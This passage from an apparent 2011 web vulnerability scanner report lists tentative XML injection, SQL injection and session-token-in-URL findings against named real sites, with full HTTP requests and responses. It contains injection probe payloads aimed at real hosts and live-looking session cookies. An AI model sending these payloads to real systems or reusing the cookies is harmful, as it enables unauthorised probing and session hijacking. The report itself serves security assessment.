The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /main]]>>/prod/utag.7001.js?utv=ut3.0.201105091600 HTTP/1.1
Host: d1nh2vjpqpfnin.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E5928E2B22A7C323
x-amz-id-2: GcBE4Hsq6F1CjZP9wOLQbuDgTgun4RGBkkR3CaYetpui+F9K6PCVyEB0UkMhH2T5
Content-Type: application/xml
Date: Mon, 16 May 2011 01:35:12 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e02d5960d05abd229675c71e1eedcdf7ca6e7353ba8b9b28ffd4b3a446781bfbed3a4c97f6ed7177
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 1e6d050f5b4e634347883494a1f55560.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E5928E2B22A7C323</RequestId><HostId>GcBE4Hsq6F1CjZP9wOLQbuDgTgun4RGBkkR3CaYetpui+F9K6P
...[SNIP]...

9.3. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://d1nh2vjpqpfnin.cloudfront.net
Path:	/main/prod/utag.7001.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /main/prod]]>>/utag.7001.js?utv=ut3.0.201105091600 HTTP/1.1
Host: d1nh2vjpqpfnin.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 95B3CCE9970C8CF7
x-amz-id-2: x4fZmVmWJL0UnnkLKC2jfaZMxPEvTzwvYaPmnwqEnqY/FMX7YDUHG9mtc/hdk+s9
Content-Type: application/xml
Date: Mon, 16 May 2011 01:35:14 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bb0979d7e1998ece82cfadec85b18c2ba4198d672e91dd551779e362aa87ad1209617fa3bac05392
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 1e6d050f5b4e634347883494a1f55560.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>95B3CCE9970C8CF7</RequestId><HostId>x4fZmVmWJL0UnnkLKC2jfaZMxPEvTzwvYaPmnwqEnqY/FMX7YD
...[SNIP]...

9.4. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://d1nh2vjpqpfnin.cloudfront.net
Path:	/main/prod/utag.7001.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /main/prod/utag.7001.js]]>>?utv=ut3.0.201105091600 HTTP/1.1
Host: d1nh2vjpqpfnin.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A7123AA90A614BF5
x-amz-id-2: G0q50YEwRLfOiIYjsIsjLdXG+CPERbHU9Rf6rw4KpAT9BnY0Fk+K/bB0eNNE8824
Content-Type: application/xml
Date: Mon, 16 May 2011 01:35:17 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0f5ef4cb25ce2dcef2bc920bc1fe52b8eb53fd264415d5bdc64c9ae8fe8434d57c85b86b953640da
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 1e6d050f5b4e634347883494a1f55560.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A7123AA90A614BF5</RequestId><HostId>G0q50YEwRLfOiIYjsIsjLdXG+CPERbHU9Rf6rw4KpAT9BnY0Fk
...[SNIP]...

9.5. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Issue detail

Request

GET /e]]>>/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw= HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Mon, 16 May 2011 01:33:43 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.6. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Issue detail

Request

GET /e/a-677]]>>/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw= HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Mon, 16 May 2011 01:33:45 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.7. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Issue detail

Request

GET /e/a-677/s-2140.xgi]]>>?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw= HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Mon, 16 May 2011 01:33:46 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.8. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform0.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets]]>>/tweet_button.html?_=1305508830997&count=horizontal&counturl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&lang=en&related=usatodaytravel&text=Disney%20executives%3A%20New%20cruise%20ship%20booking%20like%20a%20dream&url=http%3A%2F%2Fusat.ly%2Fj3NkG1 HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Mon, 16 May 2011 01:29:27 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]>>/tweet_button.html</Key><RequestId>B04C581F85F20161</Reque
...[SNIP]...

9.9. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform0.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets/tweet_button.html]]>>?_=1305508830997&count=horizontal&counturl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&lang=en&related=usatodaytravel&text=Disney%20executives%3A%20New%20cruise%20ship%20booking%20like%20a%20dream&url=http%3A%2F%2Fusat.ly%2Fj3NkG1 HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Mon, 16 May 2011 01:29:28 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]>></Key><RequestId>7A44DB1A2AEE1CC8</Reque
...[SNIP]...

9.10. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform1.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets]]>>/tweet_button.html?_=1305508830999&count=horizontal&counturl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&lang=en&related=usatodaytravel&text=Disney%20executives%3A%20New%20cruise%20ship%20booking%20like%20a%20dream&url=http%3A%2F%2Fusat.ly%2Fj3NkG1 HTTP/1.1
Host: platform1.twitter.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

9.11. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform1.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets/tweet_button.html]]>>?_=1305508830999&count=horizontal&counturl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&lang=en&related=usatodaytravel&text=Disney%20executives%3A%20New%20cruise%20ship%20booking%20like%20a%20dream&url=http%3A%2F%2Fusat.ly%2Fj3NkG1 HTTP/1.1
Host: platform1.twitter.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Mon, 16 May 2011 01:29:29 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]>></Key><RequestId>56891652A42EADBE</Reque
...[SNIP]...

9.12. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://r.nexac.com
Path:	/e/getdata.xgi

Issue detail

Request

GET /e]]>>/getdata.xgi?dt=br&pkey=vrie89u2mpteq&ru=http://m.xp1.ru4.com/meta%3f_o%3d65121%26_t%3ddx%26ssv_duid%3d%26ssv_dx_1%3d%3Cna_da%3E%26ssv_dx_2%3d%3Cna_mp%3E%26ssv_dx_3%3d%3Cna_id%3E HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Mon, 16 May 2011 01:20:13 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.13. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://r.nexac.com
Path:	/e/getdata.xgi

Issue detail

Request

GET /e/getdata.xgi]]>>?dt=br&pkey=vrie89u2mpteq&ru=http://m.xp1.ru4.com/meta%3f_o%3d65121%26_t%3ddx%26ssv_duid%3d%26ssv_dx_1%3d%3Cna_da%3E%26ssv_dx_2%3d%3Cna_mp%3E%26ssv_dx_3%3d%3Cna_id%3E HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Mon, 16 May 2011 01:20:16 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10. SQL statement in request parameter previous next
There are 2 instances of this issue:

https://store.playstation.com/external/index.vm
http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

10.1. https://store.playstation.com/external/index.vm previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://store.playstation.com
Path:	/external/index.vm

Request

GET /external/index.vm?returnURL=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: store.playstation.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 503 Service Temporarily Unavailable
Date: Sun, 15 May 2011 20:31:19 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 23:06:34 GMT
ETag: "982-4a3305b65d280"
Accept-Ranges: bytes
Content-Length: 2434
nnCoection: close
Content-Type: text/html; charset=UTF-8
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Und
...[SNIP]...

10.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&storeId=10151&catalogId=10551 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.sonystyle.com
Cookie: JSESSIONID=0000e_ezZm1KrN0WTIpmjID1gXM:14aelsphk; WC_PERSISTENT=tci4sbjs82Mq83moq8XxsNeIreY%3d%0a%3b2011%2d05%2d15+17%3a20%3a13%2e09%5f1305494413090%2d67173%5f0; TS5bbf46=2c53246df458c4d488036fa8b7ec60b139c193bb00a4beab4dd0438d60ac0ec50d34d41a529ede9ff13fdd934b9b8efe3732da8c; BIGipServerlivenew.sonystyle.com-80=1266819488.20480.0000
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 161
Date: Sun, 15 May 2011 21:20:23 GMT
Connection: close
Cache-Control: no-cache
Pragma: no-cache

<html><head><title>Request Restricted</title></head><body>The page you have requested is restricted.<br><br>Your support ID is: 5169528959791121427</body></html>

11. Session token in URL previous next
There are 6 instances of this issue:

http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard
http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard
http://sales.liveperson.net/hc/71737897/
http://sony.tt.omtrdc.net/m2/sony/mbox/ajax
http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard
http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

